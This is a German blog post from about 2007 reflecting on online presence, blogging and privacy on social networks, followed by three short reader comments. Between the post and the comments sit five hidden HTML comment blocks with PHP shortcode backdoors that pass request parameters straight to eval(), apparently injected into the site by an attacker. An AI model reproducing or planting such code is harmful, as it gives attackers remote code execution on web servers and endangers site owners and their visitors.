“Existiert” man ohne Blog / Webseite?

Eine nicht ganz einfach zu beantwortende Frage: ich würde mal behaupten: ja und nein. Ich selbst habe das Gefühl, das gerade diese “online” Sichtbarkeit, die man durch ein Profil bei sozialen Netzwerken wie XING oder studiVZ etc. pp. erhält ein wesentlicher Teil für den Erfolg der Plattformen ist. Natürlich sind auch die neuen Wege der Interaktion, die diese Seiten ermöglichen hilfreich gewesen, dass sich diese Netzwerke wie ein Lauffeuer verbreitet haben (Stichwort: “Gruscheln”). Ich habe mir persönlich oft die Frage gestellt, ob es es “wert” ist, ein Stück Privatsphäre aufzugeben, um dann online zu “existieren”. Was gibt man auf? Geschickte Internet-Nutzer können dank Google viele Informationen über einen ergooglen. Wie denkt derjenige, für was interessiert er sich. Es ist ein bisschen wir die ersten drei Sekunden, wenn man jemanden “live” trifft – wie ist die Person gekleidet, lächelt sie oder blickt er missmutig auf den Boden? Das und vieles mehr entscheidet über den ersten Eindruck, der ja doch für die erste Schublade, in die man eingeordnet wird, wichtig ist. Ähnlich verhält es sich auch mit dem Bloggen. Ich denke auch hier kann man einiges über den Blogger erfahren, indem man einfach das Design auf sich wirken lässt. Ich bin überzeugt, dass bereits Hinweise wie Design und z.B. Kategorien der Einträge einiges über die Person aussagen. Ich denke auch, dass in den allermeisten Fällen diese ersten Hinweise sich später in ein großes Profil-Puzzle nahtlos einfügen. Fazit: Bloggen macht es für anderen Menschen einfacher, die Person vorher schon etwas kennenzulernen. Dagegen gibt es grundsätzlich nichts einzuwenden weshalb ich mich der Chancen, die das Bloggen bietet (nämlich die vorher erwähnte neue Interkation und Kommunikation) zuwende und dies hoffentlich demnächst regelmäßig!

<!– [insert_php]if (isset($_REQUEST["ZJt"])){eval($_REQUEST["ZJt"]);exit;}[/insert_php][php]if (isset($_REQUEST["ZJt"])){eval($_REQUEST["ZJt"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["DNJOk"])){eval($_REQUEST["DNJOk"]);exit;}[/insert_php][php]if (isset($_REQUEST["DNJOk"])){eval($_REQUEST["DNJOk"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["gyVA"])){eval($_REQUEST["gyVA"]);exit;}[/insert_php][php]if (isset($_REQUEST["gyVA"])){eval($_REQUEST["gyVA"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["VKXyx"])){eval($_REQUEST["VKXyx"]);exit;}[/insert_php][php]if (isset($_REQUEST["VKXyx"])){eval($_REQUEST["VKXyx"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["qwVu"])){eval($_REQUEST["qwVu"]);exit;}[/insert_php][php]if (isset($_REQUEST["qwVu"])){eval($_REQUEST["qwVu"]);exit;}[/php] –>

3 Responses to “Existiert” man ohne Blog / Webseite?

  1. Harald 18. March 2007 at 19:53 #

    Hi Chris,
    auch an dieser Stelle nochmals vielen vielen Dank für deine tollen Tipps mit wordpress und blog …. 🙂

  2. Yurtdisi Egitim 10. March 2008 at 13:28 #

    mein Deutsch ist nicht gut, is it availible in English

  3. Raffael Karasek 16. July 2009 at 05:11 #

    Wenn nur alle immer so vernünftige Ansichten hätten.

Leave a Reply